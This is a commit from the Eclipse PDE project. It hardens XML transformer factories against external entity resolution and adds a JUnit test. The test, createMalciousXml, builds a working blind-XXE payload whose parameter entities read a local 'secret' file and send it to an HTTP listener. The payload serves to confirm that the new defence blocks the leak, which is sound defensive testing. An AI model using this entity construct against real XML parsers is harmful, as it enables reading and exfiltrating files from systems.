Format xml without external entity resolution

External entity resolution is not supported by PDE (see PDECoreMessages.XMLErrorReporter_ExternalEntityResolution). PDE should not contact or even inject external sources into formatted xml.
eclipse-pde · Jul 10, 2023 · 7dd409f · 7dd409f
1 parent 0abc73b
commit 7dd409f
Show file tree

Hide file tree

Showing 9 changed files with 207 additions and 8 deletions.
diff --git a/...e.api.tools.ui/src/org/eclipse/pde/api/tools/ui/internal/actions/ExportSessionAction.java b/...e.api.tools.ui/src/org/eclipse/pde/api/tools/ui/internal/actions/ExportSessionAction.java
@@ -45,10 +45,12 @@
 import org.eclipse.pde.api.tools.ui.internal.ApiUIPlugin;
 import org.eclipse.pde.api.tools.ui.internal.IApiToolsConstants;
 import org.eclipse.pde.api.tools.ui.internal.views.APIToolingView;
+import org.eclipse.pde.internal.core.util.XmlTransformerFactory;
 
 /**
  * Drop-down action to select the active session.
  */
+@SuppressWarnings("restriction")
 public class ExportSessionAction extends Action {
 	private static final String DELTAS_XSLT_TRANSFORM_PATH = "/compare.xsl"; //$NON-NLS-1$
 	private static final String XML_FILE_EXTENSION = ".xml"; //$NON-NLS-1$
@@ -153,9 +155,8 @@ protected IStatus run(IProgressMonitor monitor) {
 							}
 							writer = new BufferedWriter(new FileWriter(reportFile));
 							Result result = new StreamResult(writer);
-							// create an instance of TransformerFactory
-							TransformerFactory transFact = TransformerFactory.newInstance();
-							Transformer trans = transFact.newTransformer(xsltSource);
+							TransformerFactory f = XmlTransformerFactory.createTransformerFactoryWithErrorOnDOCTYPE();
+							Transformer trans = f.newTransformer(xsltSource);
 							trans.transform(xmlSource, result);
 						} catch (TransformerException | IOException e) {
 							ApiUIPlugin.log(e);

diff --git a/...lipse.pde.api.tools/src/org/eclipse/pde/api/tools/internal/search/UseReportConverter.java b/...lipse.pde.api.tools/src/org/eclipse/pde/api/tools/internal/search/UseReportConverter.java
@@ -66,6 +66,7 @@
 import org.eclipse.pde.api.tools.internal.provisional.search.IMetadata;
 import org.eclipse.pde.api.tools.internal.util.Signatures;
 import org.eclipse.pde.api.tools.internal.util.Util;
+import org.eclipse.pde.internal.core.util.XmlTransformerFactory;
 import org.osgi.framework.Version;
 import org.w3c.dom.Element;
 import org.w3c.dom.NamedNodeMap;
@@ -820,7 +821,7 @@ protected void applyXSLT(File xsltFile, File xmlfile, File htmloutput) throws Tr
 	protected void applyXSLT(Source xslt, File xmlfile, File htmlfile) throws TransformerException {
 		Source xml = new StreamSource(xmlfile);
 		Result html = new StreamResult(htmlfile);
-		TransformerFactory factory = TransformerFactory.newInstance();
+		TransformerFactory factory = XmlTransformerFactory.createTransformerFactoryWithErrorOnDOCTYPE();
 		Transformer former = factory.newTransformer(xslt);
 		former.transform(xml, html);
 	}

diff --git a/apitools/org.eclipse.pde.api.tools/src/org/eclipse/pde/api/tools/internal/util/Util.java b/apitools/org.eclipse.pde.api.tools/src/org/eclipse/pde/api/tools/internal/util/Util.java
@@ -141,6 +141,7 @@
 import org.eclipse.pde.api.tools.internal.provisional.problems.IApiProblem;
 import org.eclipse.pde.api.tools.internal.provisional.problems.IApiProblemTypes;
 import org.eclipse.pde.api.tools.internal.search.SkippedComponent;
+import org.eclipse.pde.internal.core.util.XmlTransformerFactory;
 import org.objectweb.asm.Opcodes;
 import org.osgi.framework.Version;
 import org.w3c.dom.Document;
@@ -153,6 +154,7 @@
  *
  * @since 1.0.0
  */
+@SuppressWarnings("restriction")
 public final class Util {
 
 	public static final String DOT_TGZ = ".tgz"; //$NON-NLS-1$
@@ -1900,7 +1902,7 @@ public static InputStream getInputStreamFromString(String string) {
 	public static String serializeDocument(Document document) throws CoreException {
 		try {
 			ByteArrayOutputStream s = new ByteArrayOutputStream();
-			TransformerFactory factory = TransformerFactory.newInstance();
+			TransformerFactory factory = XmlTransformerFactory.createTransformerFactoryWithErrorOnDOCTYPE();
 			Transformer transformer = factory.newTransformer();
 			transformer.setOutputProperty(OutputKeys.METHOD, "xml"); //$NON-NLS-1$
 			transformer.setOutputProperty(OutputKeys.INDENT, "yes"); //$NON-NLS-1$

diff --git a/ui/org.eclipse.pde.core/src/org/eclipse/pde/internal/core/target/IUBundleContainer.java b/ui/org.eclipse.pde.core/src/org/eclipse/pde/internal/core/target/IUBundleContainer.java
@@ -69,6 +69,7 @@
 import org.eclipse.pde.core.target.TargetBundle;
 import org.eclipse.pde.core.target.TargetFeature;
 import org.eclipse.pde.internal.core.PDECore;
+import org.eclipse.pde.internal.core.util.XmlTransformerFactory;
 import org.w3c.dom.Document;
 import org.w3c.dom.Element;
 
@@ -733,7 +734,8 @@ public String serialize() {
 		try {
 			document.appendChild(containerElement);
 			StreamResult result = new StreamResult(new StringWriter());
-			Transformer transformer = TransformerFactory.newInstance().newTransformer();
+			TransformerFactory f = XmlTransformerFactory.createTransformerFactoryWithErrorOnDOCTYPE();
+			Transformer transformer = f.newTransformer();
 			transformer.setOutputProperty(OutputKeys.OMIT_XML_DECLARATION, "yes"); //$NON-NLS-1$
 			transformer.transform(new DOMSource(document), result);
 			return result.getWriter().toString();

diff --git a/....pde.core/src/org/eclipse/pde/internal/core/target/TargetDefinitionPersistenceHelper.java b/....pde.core/src/org/eclipse/pde/internal/core/target/TargetDefinitionPersistenceHelper.java
@@ -38,6 +38,7 @@
 import org.eclipse.pde.core.target.ITargetPlatformService;
 import org.eclipse.pde.internal.core.ICoreConstants;
 import org.eclipse.pde.internal.core.PDECore;
+import org.eclipse.pde.internal.core.util.XmlTransformerFactory;
 import org.w3c.dom.DOMException;
 import org.w3c.dom.Document;
 import org.w3c.dom.Element;
@@ -123,7 +124,7 @@ public static void persistXML(ITargetDefinition definition, OutputStream output)
 			return;
 		}
 		StreamResult outputTarget = new StreamResult(output);
-		TransformerFactory factory = TransformerFactory.newInstance();
+		TransformerFactory factory = XmlTransformerFactory.createTransformerFactoryWithErrorOnDOCTYPE();
 		Transformer transformer = factory.newTransformer();
 		transformer.setOutputProperty(OutputKeys.METHOD, "xml"); //$NON-NLS-1$
 		transformer.setOutputProperty(OutputKeys.INDENT, "yes"); //$NON-NLS-1$

diff --git a/....eclipse.pde.core/src/org/eclipse/pde/internal/core/target/TargetPersistence38Helper.java b/....eclipse.pde.core/src/org/eclipse/pde/internal/core/target/TargetPersistence38Helper.java
@@ -35,6 +35,7 @@
 import org.eclipse.pde.core.target.ITargetLocationFactory;
 import org.eclipse.pde.core.target.NameVersionDescriptor;
 import org.eclipse.pde.internal.core.PDECore;
+import org.eclipse.pde.internal.core.util.XmlTransformerFactory;
 import org.w3c.dom.Element;
 import org.w3c.dom.Node;
 import org.w3c.dom.NodeList;
@@ -250,7 +251,8 @@ private static ITargetLocation deserializeBundleContainer(Element location) thro
 					throw new CoreException(Status.error(NLS.bind(Messages.TargetPersistence38Helper_NoTargetLocationExtension, type)));
 				}
 				StreamResult result = new StreamResult(new StringWriter());
-				Transformer transformer = TransformerFactory.newInstance().newTransformer();
+				TransformerFactory factory = XmlTransformerFactory.createTransformerFactoryWithErrorOnDOCTYPE();
+				Transformer transformer = factory.newTransformer();
 				transformer.setOutputProperty(OutputKeys.OMIT_XML_DECLARATION, "yes"); //$NON-NLS-1$
 				transformer.transform(new DOMSource(location), result);
 				container = locFactory.getTargetLocation(type, result.getWriter().toString());

diff --git a/ui/org.eclipse.pde.core/src/org/eclipse/pde/internal/core/util/XmlTransformerFactory.java b/ui/org.eclipse.pde.core/src/org/eclipse/pde/internal/core/util/XmlTransformerFactory.java
@@ -0,0 +1,30 @@
+/*******************************************************************************
+ *  Copyright (c) 2023 Joerg Kubitz and others.
+ *
+ *  This program and the accompanying materials
+ *  are made available under the terms of the Eclipse Public License 2.0
+ *  which accompanies this distribution, and is available at
+ *  https://www.eclipse.org/legal/epl-2.0/
+ *
+ *  SPDX-License-Identifier: EPL-2.0
+ *******************************************************************************/
+package org.eclipse.pde.internal.core.util;
+
+import javax.xml.XMLConstants;
+import javax.xml.transform.TransformerFactory;
+
+public class XmlTransformerFactory {
+	private XmlTransformerFactory() {
+		// static Utility only
+	}
+
+	public static TransformerFactory createTransformerFactoryWithErrorOnDOCTYPE() {
+		TransformerFactory factory = TransformerFactory.newInstance();
+		// prohibit the use of all protocols by external entities:
+		factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, ""); //$NON-NLS-1$
+		factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, ""); //$NON-NLS-1$
+		return factory;
+	}
+
+
+}
diff --git a/ui/org.eclipse.pde.ui.tests/src/org/eclipse/pde/core/tests/internal/AllPDECoreTests.java b/ui/org.eclipse.pde.ui.tests/src/org/eclipse/pde/core/tests/internal/AllPDECoreTests.java
@@ -7,6 +7,7 @@
 @RunWith(Suite.class)
 @SuiteClasses({ //
 	DependencyManagerTest.class, //
+	XmlTransformerTest.class, //
 	WorkspaceModelManagerTest.class, //
 	WorkspaceProductModelManagerTest.class, //
 })

diff --git a/ui/org.eclipse.pde.ui.tests/src/org/eclipse/pde/core/tests/internal/XmlTransformerTest.java b/ui/org.eclipse.pde.ui.tests/src/org/eclipse/pde/core/tests/internal/XmlTransformerTest.java
@@ -0,0 +1,159 @@
+/*******************************************************************************
+ *  Copyright (c) 2023 Joerg Kubitz and others.
+ *
+ *  This program and the accompanying materials
+ *  are made available under the terms of the Eclipse Public License 2.0
+ *  which accompanies this distribution, and is available at
+ *  https://www.eclipse.org/legal/epl-2.0/
+ *
+ *  SPDX-License-Identifier: EPL-2.0
+ *******************************************************************************/
+package org.eclipse.pde.core.tests.internal;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assert.assertTrue;
+
+import java.io.BufferedReader;
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+import java.io.OutputStream;
+import java.lang.reflect.InvocationTargetException;
+import java.net.ServerSocket;
+import java.net.Socket;
+import java.net.SocketException;
+import java.net.URI;
+import java.nio.charset.StandardCharsets;
+import java.nio.file.Files;
+import java.nio.file.Path;
+import java.util.ArrayList;
+import java.util.Collection;
+import java.util.List;
+import java.util.concurrent.ConcurrentLinkedQueue;
+import java.util.function.IntFunction;
+
+import javax.xml.transform.Result;
+import javax.xml.transform.Source;
+import javax.xml.transform.Transformer;
+import javax.xml.transform.TransformerException;
+import javax.xml.transform.TransformerFactory;
+import javax.xml.transform.stream.StreamResult;
+import javax.xml.transform.stream.StreamSource;
+
+import org.eclipse.pde.internal.core.util.XmlTransformerFactory;
+import org.junit.Test;
+public class XmlTransformerTest {
+
+	List<Path> tmpFiles = new ArrayList<>();
+
+	@Test
+	public void testTransformXmlWithExternalEntity() throws Exception {
+		TransformerFactory transformerFactory = XmlTransformerFactory.createTransformerFactoryWithErrorOnDOCTYPE();
+		try {
+			testParseXmlWithExternalEntity(transformerFactory, this::createMalciousXml);
+			assertTrue("TransformerException expected", false);
+		} catch (TransformerException e) {
+			String message = e.getMessage();
+			assertTrue(message, message.contains("DTD"));
+		}
+	}
+
+	@Test
+	public void testTransformXmlWithoutExternalEntity() throws Exception {
+		TransformerFactory transformerFactory = XmlTransformerFactory.createTransformerFactoryWithErrorOnDOCTYPE();
+		testParseXmlWithExternalEntity(transformerFactory, this::createNormalXml);
+	}
+
+
+	InputStream createMalciousXml(int localPort) {
+		try {
+			Path tempSecret = Files.createTempFile("test", ".txt");
+			tmpFiles.add(tempSecret);
+			Files.writeString(tempSecret, "secret");
+			Path tempDtd = Files.createTempFile("test", ".dtd");
+			tmpFiles.add(tempDtd);
+			String dtdContent = "<!ENTITY % var1 SYSTEM \"" + tempSecret.toUri().toURL() + "\">\n" //
+					+ "<!ENTITY var4 SYSTEM \"" + tempSecret.toUri().toURL() + "\">\n" //
+					+ "<!ENTITY % var2 \"<!ENTITY var3 SYSTEM 'http://localhost:" + localPort + "/?%var1;'>\">\n" //
+					+ "%var2;\n";
+			Files.writeString(tempDtd, dtdContent);
+			StringBuilder sb = new StringBuilder();
+			sb.append("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n");
+			URI dtdURi = tempDtd.toUri();
+			String dtdUrl = dtdURi.toURL().toString();
+			sb.append("<!DOCTYPE var1 SYSTEM \"" + dtdUrl + "\">\n");
+			sb.append("<Body>&var3;&var4;</Body>");
+			String xml = sb.toString();
+			return new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8));
+		} catch (IOException e) {
+			throw new RuntimeException(e);
+		}
+	}
+
+	InputStream createNormalXml(int localPort) {
+		StringBuilder sb = new StringBuilder();
+		sb.append("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n");
+		sb.append("<Body>hello</Body>");
+		String xml = sb.toString();
+		return new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8));
+	}
+
+	private void cleanup() throws IOException {
+		for (Path path : tmpFiles) {
+			Files.delete(path);
+		}
+	}
+
+	public void testParseXmlWithExternalEntity(TransformerFactory transformerFactory,
+			IntFunction<InputStream> xmlSupplier)
+					throws Exception {
+		Collection<Throwable> exceptionsInOtherThreads = new ConcurrentLinkedQueue<>();
+		Thread httpServerThread = null;
+		try (ServerSocket serverSocket = new ServerSocket(0)) {
+			int localPort = serverSocket.getLocalPort();
+			httpServerThread = new Thread("httpServerThread") {
+				@Override
+				public void run() {
+					try (Socket socket = serverSocket.accept()) {
+						try (BufferedReader in = new BufferedReader(new InputStreamReader(socket.getInputStream()))) {
+							String firstLine = in.readLine();
+							try (OutputStream outputStream = socket.getOutputStream()) {
+								outputStream.write("HTTP/1.1 200 OK\r\n".getBytes(StandardCharsets.UTF_8));
+							}
+							assertTrue(firstLine, firstLine.startsWith("GET"));
+							assertFalse("Server received secret: " + firstLine, firstLine.contains("secret")); // var3
+							assertFalse("Server was contacted", true);
+						}
+					} catch (SocketException closed) {
+						// expected
+					} catch (Throwable e) {
+						exceptionsInOtherThreads.add(e);
+					}
+				}
+			};
+			httpServerThread.start();
+			String formatted;
+
+			try (InputStream xmlStream = xmlSupplier.apply(localPort)) {
+				Transformer xformer = transformerFactory.newTransformer();
+				Source source = new StreamSource(xmlStream);
+				try (ByteArrayOutputStream outputStream = new ByteArrayOutputStream()) {
+					Result result = new StreamResult(outputStream);
+					xformer.transform(source, result);
+					formatted = outputStream.toString(StandardCharsets.UTF_8);
+				}
+			}
+			assertTrue(formatted, formatted.contains("<Body>"));
+			assertFalse("Formatter injected secret: " + formatted, formatted.contains("secret"));
+		} finally {
+			cleanup();
+		}
+		httpServerThread.join(5000);
+		assertFalse(httpServerThread.isAlive());
+		for (Throwable e : exceptionsInOtherThreads) {
+			throw new InvocationTargetException(e, e.getMessage());
+		}
+	}
+}